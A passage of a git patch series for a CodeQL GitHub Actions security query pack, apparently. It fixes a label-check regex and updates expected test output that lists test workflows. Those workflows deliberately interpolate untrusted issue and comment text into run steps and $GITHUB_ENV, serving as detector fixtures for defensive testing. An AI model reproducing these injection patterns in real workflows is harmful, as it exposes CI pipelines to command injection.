=?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 25 Oct 2024 10:26:47 +0200 Subject: [PATCH 632/707] Fix LabelIf ControlCheck so that it recognizes checks not at the beginning of the expression --- ql/lib/codeql/actions/security/ControlChecks.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index c73b06ae5302..a24fd44b8650 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -165,7 +165,7 @@ class LabelIfCheck extends LabelCheck instanceof If { condition = normalizeExpr(this.getCondition()) and ( // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') - condition.regexpMatch("(^|[^!])contains\\(\\s*github\\.event\\.pull_request\\.labels\\b.*") + condition.regexpMatch(".*(^|[^!])contains\\(\\s*github\\.event\\.pull_request\\.labels\\b.*") or // eg: github.event.label.name == 'safe to test' condition.regexpMatch(".*\\bgithub\\.event\\.label\\.name\\s*==.*") From e6e170402169663b894a77c02b2d1585b134a12e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 25 Oct 2024 10:26:51 +0200 Subject: [PATCH 633/707] Update tests --- ql/test/library-tests/test.expected | 1741 ++++++++++++++++- ql/test/library-tests/test.ql | 55 - .../.github/workflows/resolve-args.yml | 36 + .../CWE-829/.github/workflows/test26.yml | 22 + .../CWE-829/.github/workflows/test27.yml | 22 + .../CWE-829/.github/workflows/test28.yml | 20 + .../UntrustedCheckoutCritical.expected | 10 +- .../CWE-829/UntrustedCheckoutMedium.expected | 3 + 8 files changed, 1849 insertions(+), 60 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index e2fb80df77f9..8d3e4193c69c 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -1,2 +1,1739 @@ -ERROR: Ast::ShellScript is incompatible with string (test.ql:24,66-67) -ERROR: getCallee() cannot be resolved for type DataFlowPublic::CallNode (test.ql:62,79-88) +files +| .github/workflows/commands.yml:0:0:0:0 | .github/workflows/commands.yml | +| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | +| .github/workflows/multiline2.yml:0:0:0:0 | .github/workflows/multiline2.yml | +| .github/workflows/multiline.yml:0:0:0:0 | .github/workflows/multiline.yml | +| .github/workflows/poisonable_steps.yml:0:0:0:0 | .github/workflows/poisonable_steps.yml | +| .github/workflows/shell.yml:0:0:0:0 | .github/workflows/shell.yml | +| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | +workflows +| .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/test.yml:1:1:40:53 | on: push | +reusableWorkflows +compositeActions +jobs +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +localJobs +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +extJobs +steps +| .github/workflows/commands.yml:15:9:18:6 | Run Step | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline2.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline2.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline2.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline2.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline2.yml:85:9:89:35 | Run Step | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +runExprs +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +uses +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +stepUses +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +usesArgs +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | script | .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +runStepChildren +| .github/workflows/commands.yml:15:9:18:6 | Run Step | .github/workflows/commands.yml:15:16:15:25 | bash -step | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | .github/workflows/commands.yml:34:16:34:25 | bash -step | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | .github/workflows/commands.yml:37:16:37:19 | pwsh | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:63:15:63:19 | line1 | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:63:15:63:19 | line1 | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:66:15:66:24 | multiline1 | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:71:15:71:21 | block11 | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:78:15:78:21 | block12 | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:15:85:21 | block13 | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | .github/workflows/shell.yml:7:16:7:19 | pwsh | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | .github/workflows/shell.yml:12:14:12:23 | echo "foo" | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | .github/workflows/shell.yml:17:16:17:19 | bash | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | .github/workflows/shell.yml:18:14:18:23 | echo "foo" | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +parentNodes +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:1:39:30 | on: push | +| 